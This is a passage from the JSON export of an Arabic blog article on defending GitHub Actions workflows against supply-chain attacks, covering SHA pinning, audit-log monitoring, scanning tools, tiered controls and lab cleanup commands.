\u0627\u0644\u0623\u0645\u0646\u064a\u0629<\/strong><\/li>\n<\/ol>\n<p>\u0639\u0646\u062f\u0645\u0627 \u062a\u062d\u062a\u0648\u064a action \u0645\u062b\u0628\u062a\u0629 \u0639\u0644\u0649 \u062b\u063a\u0631\u0629 \u0645\u0639\u0631\u0648\u0641\u0629\u060c \u0633\u064a\u0646\u0634\u0626 Dependabot \u0637\u0644\u0628 PR \u0644\u0644\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0623\u0645\u0646\u064a. \u0644\u0623\u0646\u0643 \u0645\u062b\u0628\u062a \u0628\u0640 SHA\u060c \u064a\u0638\u0647\u0631 \u0627\u0644\u0641\u0631\u0642 \u0628\u0648\u0636\u0648\u062d \u0647\u0627\u0634\u0627\u062a \u0627\u0644\u0627\u0644\u062a\u0632\u0627\u0645 \u0627\u0644\u0642\u062f\u064a\u0645\u0629 \u0648\u0627\u0644\u062c\u062f\u064a\u062f\u0629\u060c \u0645\u0645\u0627 \u064a\u0633\u0647\u0651\u0644 \u0645\u0631\u0627\u062c\u0639\u0629 \u0645\u0627 \u062a\u063a\u064a\u0631 \u0628\u0627\u0644\u0636\u0628\u0637.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0645\u0631\u0627\u0642\u0628\u0629 \u0633\u062c\u0644 \u0627\u0644\u062a\u062f\u0642\u064a\u0642 (GitHub Enterprise)<\/h3>\n<p>\u0644\u0644\u0645\u0646\u0638\u0645\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0633\u062a\u062e\u062f\u0645 GitHub Enterprise\u060c \u0641\u0639\u0651\u0644 \u0628\u062b \u0633\u062c\u0644 \u0627\u0644\u062a\u062f\u0642\u064a\u0642 \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u062a\u0639\u062f\u064a\u0644\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644:<\/p>\n<pre><code># \u0627\u0644\u0627\u0633\u062a\u0639\u0644\u0627\u0645 \u0641\u064a \u0633\u062c\u0644 \u0627\u0644\u062a\u062f\u0642\u064a\u0642 \u0639\u0646 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644\ngh api orgs\/YOUR_ORG\/audit-log \\\n  --method GET \\\n  -f phrase='action:workflows' \\\n  -f per_page=50 \\\n  --jq '.[] | {actor: .actor, action: .action, repo: .repo, created_at: .created_at}'<\/code><\/pre>\n<h2>\u0628\u0646\u0627\u0621 \u0627\u0633\u062a\u0631\u0627\u062a\u064a\u062c\u064a\u0629 \u0627\u0644\u062f\u0641\u0627\u0639<\/h2>\n<p>\u0644\u064a\u0633\u062a \u0643\u0644 \u0627\u0644\u0645\u0646\u0638\u0645\u0627\u062a \u062a\u062d\u062a\u0627\u062c \u0643\u0644 \u0639\u0646\u0635\u0631 \u062a\u062d\u0643\u0645. \u0625\u0644\u064a\u0643 \u0646\u0647\u062c \u0645\u062a\u062f\u0631\u062c \u0628\u0646\u0627\u0621\u064b \u0639\u0644\u0649 \u0645\u062a\u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0623\u0645\u0627\u0646 \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0643:<\/p>\n<h3>\u0627\u0644\u0645\u0633\u062a\u0648\u0649 1: \u0627\u0644\u062d\u062f \u0627\u0644\u0623\u062f\u0646\u0649 (\u062c\u0645\u064a\u0639 \u0627\u0644\u0645\u0646\u0638\u0645\u0627\u062a)<\/h3>\n<ul>\n<li><strong>\u062b\u0628\u0651\u062a \u062c\u0645\u064a\u0639 \u0627\u0644\u0640 actions \u0628\u0647\u0627\u0634\u0627\u062a SHA \u0627\u0644\u0643\u0627\u0645\u0644\u0629<\/strong> \u2014 \u064a\u0645\u0646\u0639 \u0647\u062c\u0645\u0627\u062a \u062a\u063a\u064a\u064a\u0631 \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a<\/li>\n<li><strong>\u0641\u0639\u0651\u0644 Dependabot \u0644\u0640 github-actions<\/strong> \u2014 \u064a\u0624\u062a\u0645\u062a \u062a\u062d\u062f\u064a\u062b\u0627\u062a SHA<\/li>\n<li><strong>\u0627\u0636\u0628\u0637 \u0627\u0644\u062d\u062f \u0627\u0644\u0623\u062f\u0646\u0649 \u0645\u0646 \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a<\/strong> \u2014 \u0627\u0633\u062a\u062e\u062f\u0645 <code>permissions:<\/code> \u0639\u0644\u0649 \u0645\u0633\u062a\u0648\u0649 \u0645\u0633\u0627\u0631 \u0627\u0644\u0639\u0645\u0644 \u0648\u0627\u0644\u0648\u0638\u064a\u0641\u0629<\/li>\n<\/ul>\n<p>\u0627\u0644\u062c\u0647\u062f: \u0645\u0646\u062e\u0641\u0636. \u0627\u0644\u0623\u062b\u0631: \u064a\u062d\u062c\u0628 \u0646\u0627\u0642\u0644 \u0627\u0644\u0647\u062c\u0648\u0645 \u0627\u0644\u0623\u0643\u062b\u0631 \u0634\u064a\u0648\u0639\u064b\u0627 (\u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u0627\u0644\u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631).<\/p>\n<h3>\u0627\u0644\u0645\u0633\u062a\u0648\u0649 2: \u0627\u0644\u0645\u0648\u0635\u0649 \u0628\u0647 (\u0645\u0639\u0638\u0645 \u0627\u0644\u0645\u0646\u0638\u0645\u0627\u062a)<\/h3>\n<p>\u0643\u0644 \u0645\u0627 \u0641\u064a \u0627\u0644\u0645\u0633\u062a\u0648\u0649 1\u060c \u0628\u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649:<\/p>\n<ul>\n<li><strong>\u062a\u0634\u063a\u064a\u0644 actionlint \u0648zizmor \u0641\u064a CI<\/strong> \u2014 \u064a\u0643\u062a\u0634\u0641 \u062b\u063a\u0631\u0627\u062a \u0627\u0644\u062d\u0642\u0646 \u0648\u0623\u062e\u0637\u0627\u0621 \u0627\u0644\u062a\u0643\u0648\u064a\u0646 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0642\u0628\u0644 \u062f\u0645\u062c\u0647\u0627<\/li>\n<li><strong>\u0625\u0639\u062f\u0627\u062f CODEOWNERS \u0644\u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/strong> \u2014 \u064a\u0636\u0645\u0646 \u0645\u0631\u0627\u062c\u0639\u0629 \u0641\u0631\u064a\u0642 \u0627\u0644\u0623\u0645\u0627\u0646 \u0644\u062c\u0645\u064a\u0639 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/li>\n<li><strong>\u062a\u0641\u0639\u064a\u0644 \u0642\u0648\u0627\u0639\u062f \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0641\u0631\u0639<\/strong> \u2014 \u0637\u0644\u0628 \u0641\u062d\u0648\u0635\u0627\u062a \u0627\u0644\u062d\u0627\u0644\u0629 \u0648\u0645\u0631\u0627\u062c\u0639\u0627\u062a \u0645\u0627\u0644\u0643\u064a \u0627\u0644\u0634\u064a\u0641\u0631\u0629<\/li>\n<\/ul>\n<p>\u0627\u0644\u062c\u0647\u062f: \u0645\u062a\u0648\u0633\u0637. \u0627\u0644\u0623\u062b\u0631: \u064a\u0643\u062a\u0634\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0623\u062b\u0646\u0627\u0621 \u0627\u0644\u062a\u0637\u0648\u064a\u0631 \u0648\u064a\u0636\u0645\u0646 \u0627\u0644\u0645\u0631\u0627\u062c\u0639\u0629.<\/p>\n<h3>\u0627\u0644\u0645\u0633\u062a\u0648\u0649 3: \u0627\u0644\u0623\u0645\u0627\u0646 \u0627\u0644\u0639\u0627\u0644\u064a (\u0627\u0644\u0635\u0646\u0627\u0639\u0627\u062a \u0627\u0644\u0645\u0646\u0638\u0645\u0629\u060c \u0627\u0644\u0623\u0647\u062f\u0627\u0641 \u0639\u0627\u0644\u064a\u0629 \u0627\u0644\u0642\u064a\u0645\u0629)<\/h3>\n<p>\u0643\u0644 \u0645\u0627 \u0641\u064a \u0627\u0644\u0645\u0633\u062a\u0648\u0649 2\u060c \u0628\u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649:<\/p>\n<ul>\n<li><strong>\u0641\u0631\u0636 \u0642\u0627\u0626\u0645\u0629 \u0628\u064a\u0636\u0627\u0621 \u0644\u0644\u0640 actions<\/strong> \u2014 \u0641\u0642\u0637 \u0627\u0644\u0640 actions \u0627\u0644\u0645\u0639\u062a\u0645\u062f\u0629 \u0645\u0633\u0628\u0642\u064b\u0627 \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627<\/li>\n<li><strong>\u062a\u062f\u0642\u064a\u0642 \u0623\u0645\u0646\u064a \u064a\u062f\u0648\u064a \u0644\u0643\u0644 action \u062c\u062f\u064a\u062f\u0629<\/strong> \u2014 \u0645\u0631\u0627\u062c\u0639\u0629 \u0643\u0627\u0645\u0644\u0629 \u0644\u0644\u0634\u064a\u0641\u0631\u0629 \u0642\u0628\u0644 \u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649 \u0627\u0644\u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0628\u064a\u0636\u0627\u0621<\/li>\n<li><strong>\u0646\u0633\u062e \u0627\u0644\u0640 actions \u0627\u0644\u062d\u0631\u062c\u0629 \u062f\u0627\u062e\u0644\u064a\u064b\u0627<\/strong> \u2014 \u0627\u0644\u062d\u0641\u0627\u0638 \u0639\u0644\u0649 \u0646\u0633\u062e\u0643 \u0627\u0644\u062e\u0627\u0635\u0629 \u0645\u0646 \u0627\u0644\u0640 actions \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629 \u0644\u0625\u0632\u0627\u0644\u0629 \u0627\u0644\u062a\u0628\u0639\u064a\u0629 \u0627\u0644\u062e\u0627\u0631\u062c\u064a\u0629<\/li>\n<li><strong>\u062a\u0642\u0627\u0631\u064a\u0631 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u0622\u0644\u064a\u0629<\/strong> \u2014 \u062a\u0639\u0644\u064a\u0642\u0627\u062a PR \u062a\u0644\u062e\u0635 \u062c\u0645\u064a\u0639 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0627\u0644\u0640 actions<\/li>\n<li><strong>\u0645\u0631\u0627\u0642\u0628\u0629 \u0633\u062c\u0644 \u0627\u0644\u062a\u062f\u0642\u064a\u0642<\/strong> \u2014 \u062a\u0646\u0628\u064a\u0647\u0627\u062a \u0641\u0648\u0631\u064a\u0629 \u0639\u0646\u062f \u062a\u0639\u062f\u064a\u0644 \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/li>\n<\/ul>\n<p>\u0627\u0644\u062c\u0647\u062f: \u0639\u0627\u0644\u064a. \u0627\u0644\u0623\u062b\u0631: \u062f\u0641\u0627\u0639 \u0634\u0627\u0645\u0644 \u0636\u062f \u0647\u062c\u0645\u0627\u062a \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f \u0645\u0646 \u062e\u0644\u0627\u0644 Actions.<\/p>\n<h2>\u0627\u0644\u062a\u0646\u0638\u064a\u0641<\/h2>\n<p>\u0628\u0639\u062f \u0625\u0643\u0645\u0627\u0644 \u0627\u0644\u0645\u062e\u062a\u0628\u0631\u060c \u0646\u0638\u0651\u0641 \u0623\u064a \u0645\u0648\u0627\u0631\u062f \u0627\u062e\u062a\u0628\u0627\u0631:<\/p>\n<pre><code># \u062d\u0630\u0641 \u0645\u0633\u062a\u0648\u062f\u0639 \u0627\u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0625\u0630\u0627 \u0623\u0646\u0634\u0623\u062a \u0648\u0627\u062d\u062f\u064b\u0627\ngh repo delete actions-security-lab --yes\n\n# \u062d\u0630\u0641 \u0645\u062c\u0644\u062f\u0627\u062a \u0627\u0644\u062a\u062f\u0642\u064a\u0642 \u0627\u0644\u0645\u0633\u062a\u0646\u0633\u062e\u0629\nrm -rf \/tmp\/audit-checkout \/tmp\/audit-setup-node \/tmp\/audit-cache\n\n# \u0625\u0632\u0627\u0644\u0629 \u062a\u062b\u0628\u064a\u062a \u0627\u0644\u0623\u062f\u0648\u0627\u062a \u0625\u0630\u0627 \u0644\u0645 \u062a\u0639\u062f \u0645\u0637\u0644\u0648\u0628\u0629\n# brew uninstall actionlint\n# pip uninstall zizmor<\/code><\/pre>\n<p>\u0625\u0630\u0627 \u0627\u0633\u062a\u062e\u062f\u0645\u062a \u0645\u0633\u062a\u0648\u062f\u0639\u0643 \u0627\u0644\u062e\u0627\u0635\u060c \u0627\u0631\u062c\u0639 \u0639\u0646 \u0623\u064a \u0645\u0633\u0627\u0631\u0627\u062a \u0639\u0645\u0644 \u0627\u062e\u062a\u0628\u0627\u0631 \u0636\u0639\u064a\u0641\u0629:<\/p>\n<pre><code>git checkout main\ngit branch -D test-unapproved-action\nrm -f .github\/workflows\/greet-pr.yml<\/code><\/pre>\n<h2>\u0627\u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629<\/h2>\n<ul>\n<li><strong>GitHub Actions \u0645\u0646 \u0627\u0644\u0623\u0637\u0631\u0627\u0641 \u0627\u0644\u062b\u0627\u0644\u062b\u0629 \u062a\u0645\u062b\u0644 \u062e\u0637\u0631\u064b\u0627 \u0639\u0644\u0649 \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f.<\/strong> \u0643\u0644 \u062a\u0648\u062c\u064a\u0647 <code>uses:<\/code> \u064a\u0646\u0641\u0630 \u0634\u064a\u0641\u0631\u0629 \u062e\u0627\u0631\u062c\u064a\u0629 \u0641\u064a \u0628\u064a\u0626\u0629 CI \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0643 \u0645\u0639 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0623\u0633\u0631\u0627\u0631\u0643 \u0648\u0631\u0645\u0648\u0632\u0643 \u0627\u0644\u0645\u0645\u064a\u0632\u0629.<\/li>\n<li><strong>\u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u0627\u0644\u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u0647\u064a \u0627\u0644\u0633\u0628\u0628 \u0627\u0644\u062c\u0630\u0631\u064a \u0644\u0645\u0639\u0638\u0645 \u0627\u062e\u062a\u0631\u0627\u0642\u0627\u062a \u0627\u0644\u0640 actions.<\/strong> \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0628\u0647\u0627\u0634\u0627\u062a SHA \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u064a\u0632\u064a\u0644 \u0647\u062c\u0645\u0627\u062a \u062a\u063a\u064a\u064a\u0631 \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a\u060c \u0648\u0647\u064a \u0646\u0627\u0642\u0644 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0623\u0643\u062b\u0631 \u0634\u064a\u0648\u0639\u064b\u0627.<\/li>\n<li><strong>\u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a \u0647\u064a \u0623\u0643\u062b\u0631 \u062b\u063a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0627\u0646\u062a\u0634\u0627\u0631\u064b\u0627.<\/strong> \u0644\u0627 \u062a\u0633\u062a\u0643\u0645\u0644 \u0623\u0628\u062f\u064b\u0627 \u0628\u064a\u0627\u0646\u0627\u062a \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629 (\u0639\u0646\u0627\u0648\u064a\u0646 PR\u060c \u0623\u0633\u0645\u0627\u0621 \u0627\u0644\u0641\u0631\u0648\u0639\u060c \u0631\u0633\u0627\u0626\u0644 \u0627\u0644\u0627\u0644\u062a\u0632\u0627\u0645) \u0645\u0628\u0627\u0634\u0631\u0629 \u0641\u064a \u0643\u062a\u0644 <code>run:<\/code> \u2014 \u0627\u0633\u062a\u062e\u062f\u0645 \u062f\u0627\u0626\u0645\u064b\u0627 \u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629.<\/li>\n<li><strong>\u0627\u0644\u0641\u062d\u0635 \u0627\u0644\u0622\u0644\u064a \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 actionlint \u0648zizmor \u064a\u0643\u062a\u0634\u0641 \u0645\u0627 \u062a\u0641\u0648\u062a\u0647 \u0627\u0644\u0645\u0631\u0627\u062c\u0639\u0629 \u0627\u0644\u064a\u062f\u0648\u064a\u0629.<\/strong> \u0627\u0633\u062a\u062e\u062f\u0645 \u0643\u0644\u062a\u0627 \u0627\u0644\u0623\u062f\u0627\u062a\u064a\u0646 \u0641\u064a \u062e\u0637 \u0623\u0646\u0627\u0628\u064a\u0628 CI \u0627\u0644\u062e\u0627\u0635 \u0628\u0643 \u2014 actionlint \u0644\u0644\u0635\u062d\u0629 \u0648\u0627\u0644\u0623\u0645\u0627\u0646 \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u060c \u0648zizmor \u0644\u0644\u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u0623\u0645\u0646\u064a \u0627\u0644\u0639\u0645\u064a\u0642.<\/li>\n<li><strong>\u0627\u0644\u062f\u0641\u0627\u0639 \u0627\u0644\u0639\u0645\u064a\u0642 \u0636\u0631\u0648\u0631\u064a.<\/strong> \u0644\u0627 \u064a\u0643\u0641\u064a \u0639\u0646\u0635\u0631 \u062a\u062d\u0643\u0645 \u0648\u0627\u062d\u062f. \u0627\u062f\u0645\u062c \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0648\u0627\u0644\u0641\u062d\u0635 \u0648\u0627\u0644\u0642\u0648\u0627\u0626\u0645 \u0627\u0644\u0628\u064a\u0636\u0627\u0621 \u0648CODEOWNERS \u0648\u0627\u0644\u0645\u0631\u0627\u0642\u0628\u0629 \u0644\u062d\u0645\u0627\u064a\u0629 \u0634\u0627\u0645\u0644\u0629.<\/li>\n<li><strong>\u0639\u0627\u0645\u0644 \u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0643\u0634\u064a\u0641\u0631\u0629 \u0625\u0646\u062a\u0627\u062c.<\/strong> \u062a\u0633\u062a\u062d\u0642 \u0646\u0641\u0633 \u0639\u0645\u0644\u064a\u0627\u062a \u0627\u0644\u0645\u0631\u0627\u062c\u0639\u0629 \u0648\u0627\u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0648\u0625\u062f\u0627\u0631\u0629 \u0627\u0644\u062a\u063a\u064a\u064a\u0631 \u0643\u0634\u064a\u0641\u0631\u0629 \u062a\u0637\u0628\u064a\u0642\u0643.<\/li>\n<\/ul>\n<h2>\u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u062a\u0627\u0644\u064a\u0629<\/h2>\n<p>\u0648\u0627\u0635\u0644 \u0628\u0646\u0627\u0621 \u0645\u0639\u0631\u0641\u062a\u0643 \u0628\u0623\u0645\u0627\u0646 CI\/CD \u0645\u0639 \u0647\u0630\u0647 \u0627\u0644\u0623\u062f\u0644\u0629 \u0630\u0627\u062a \u0627\u0644\u0635\u0644\u0629:<\/p>\n<ul>\n<li><a href=\"\/ar\/ci-cd-security\/defensive-patterns-mitigations-ci-cd-pipeline-attacks\/\">\u0627\u0644\u0623\u0646\u0645\u0627\u0637 \u0627\u0644\u062f\u0641\u0627\u0639\u064a\u0629 \u0648\u0627\u0644\u062a\u062e\u0641\u064a\u0641\u0627\u062a \u0644\u0647\u062c\u0645\u0627\u062a \u062e\u0637\u0648\u0637 \u0623\u0646\u0627\u0628\u064a\u0628 CI\/CD<\/a> \u2014 \u062a\u0639\u0644\u0651\u0645 \u0627\u0633\u062a\u0631\u0627\u062a\u064a\u062c\u064a\u0627\u062a \u062f\u0641\u0627\u0639\u064a\u0629 \u0623\u0648\u0633\u0639 \u0644\u062d\u0645\u0627\u064a\u0629 \u062e\u0637 \u0623\u0646\u0627\u0628\u064a\u0628 CI\/CD \u0628\u0627\u0644\u0643\u0627\u0645\u0644 \u0628\u0645\u0627 \u064a\u062a\u062c\u0627\u0648\u0632 GitHub Actions \u0641\u0642\u0637.<\/li>\n<li><a href=\"\/ar\/ci-cd-security\/ci-cd-execution-models-trust-assumptions-security-guide\/\">\u0646\u0645\u0627\u0630\u062c \u062a\u0646\u0641\u064a\u0630 CI\/CD \u0648\u0627\u0641\u062a\u0631\u0627\u0636\u0627\u062a \u0627\u0644\u062b\u0642\u0629<\/a> \u2014 \u0641\u0647\u0645 \u062d\u062f\u0648\u062f \u0627\u0644\u062b\u0642\u0629 \u0648\u0646\u0645\u0627\u0630\u062c \u0627\u0644\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u064a \u062a\u062f\u0639\u0645 \u0623\u0645\u0627\u0646 CI\/CD\u060c \u0648\u0643\u064a\u0641\u064a\u0629 \u062a\u0635\u0645\u064a\u0645 \u062e\u0637\u0648\u0637 \u0627\u0644\u0623\u0646\u0627\u0628\u064a\u0628 \u0628\u0627\u0641\u062a\u0631\u0627\u0636\u0627\u062a \u0627\u0644\u0623\u0645\u0627\u0646 \u0623\u0648\u0644\u0627\u064b.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>\u0646\u0638\u0631\u0629 \u0639\u0627\u0645\u0629 \u062a\u064f\u0639\u062f GitHub Actions \u0645\u0646 \u0627\u0644\u0623\u0637\u0631\u0627\u0641 \u0627\u0644\u062b\u0627\u0644\u062b\u0629 \u0648\u0627\u062d\u062f\u0629 \u0645\u0646 \u0623\u0643\u062b\u0631 \u0627\u0644\u0645\u064a\u0632\u0627\u062a \u0645\u0644\u0627\u0621\u0645\u0629 \u0641\u064a \u0646\u0638\u0627\u0645 GitHub. \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u062a\u0648\u062c\u064a\u0647 uses: \u0648\u0627\u062d\u062f\u060c \u064a\u0645\u0643\u0646\u0643 \u0627\u0633\u062a\u064a\u0631\u0627\u062f \u0645\u0646\u0637\u0642 \u0628\u0646\u0627\u0621 \u0645\u0639\u0642\u062f\u060c \u0623\u0648 \u0627\u0644\u0646\u0634\u0631 \u0639\u0644\u0649 \u0645\u0632\u0648\u062f\u064a \u0627\u0644\u062e\u062f\u0645\u0627\u062a \u0627\u0644\u0633\u062d\u0627\u0628\u064a\u0629\u060c \u0623\u0648 \u062a\u0634\u063a\u064a\u0644 \u0623\u062f\u0648\u0627\u062a \u0627\u0644\u0641\u062d\u0635 \u0627\u0644\u0623\u0645\u0646\u064a. \u0644\u0643\u0646 \u0647\u0630\u0647 \u0627\u0644\u0631\u0627\u062d\u0629 \u062a\u0623\u062a\u064a \u0645\u0639 \u0645\u0642\u0627\u064a\u0636\u0629 \u062d\u0631\u062c\u0629: \u0643\u0644 action \u0645\u0646 \u0637\u0631\u0641 \u062b\u0627\u0644\u062b \u062a\u0646\u0641\u0630 \u0634\u064a\u0641\u0631\u0629 \u0628\u0631\u0645\u062c\u064a\u0629 \u0641\u064a \u0628\u064a\u0626\u0629 CI \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0643 \u0645\u0639 \u0625\u0645\u0643\u0627\u0646\u064a\u0629 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0623\u0633\u0631\u0627\u0631\u0643 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26,29,31],"tags":[],"post_folder":[],"class_list":["post-828","post","type-post","status-publish","format-standard","hentry","category-ci-cd-security","category-github-actions","category-threats-attacks"],"_links":{"self":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/posts\/828","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/comments?post=828"}],"version-history":[{"count":0,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/posts\/828\/revisions"}],"wp:attachment":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/media?parent=828"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/categories?post=828"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/tags?post=828"},{"taxonomy":"post_folder","embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/post_folder?post=828"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}